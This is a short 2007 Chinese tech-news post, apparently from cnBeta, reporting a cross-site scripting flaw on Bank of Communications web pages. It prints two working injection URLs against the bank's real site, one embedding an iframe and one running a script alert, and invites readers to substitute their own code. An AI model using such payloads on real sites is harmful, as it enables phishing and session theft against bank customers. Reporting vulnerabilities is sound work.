返回上一页  首页 | cnbeta报时: 05:01:04
交通银行网页存在跨站漏洞
发布日期:2007-06-24 19:43:45  稿源:

新闻来源:原创
交通银行网页存在跨站漏洞,可以在页面中挂iframe,英文版和繁体版均存在此问题,以下是测试过程"
提交:

http://www.bankcomm.com/jh/cn/detail.jsp?c=1121231469100&id=1176793794100&type=CMS.STD&cName=业务推介<iframe%20src=http://www.cnbeta.com></iframe>

为cnbeta增加点流量,点击这里测试

提交:

http://www.bankcomm.com/jh/cn/detail.jsp?c=1121231469100&id=1176793794100&type=CMS.STD&cName=业务推介<script>alert("吓小MM用的")</script> 

吓小MM用的,点击这里测试

其他的不演示了

把上面URL中“业务推荐”后的代码换成你的即可.
我们在FebBox(https://www.febbox.com/cnbeta) 开通了新的频道,更好阅读体验,更及时更新提醒,欢迎前来阅览和打赏。
查看网友评论   返回完整版观看

返回上一页  首页 | cnbeta报时: 05:01:04

文字版  标准版  电脑端

© 2003-2025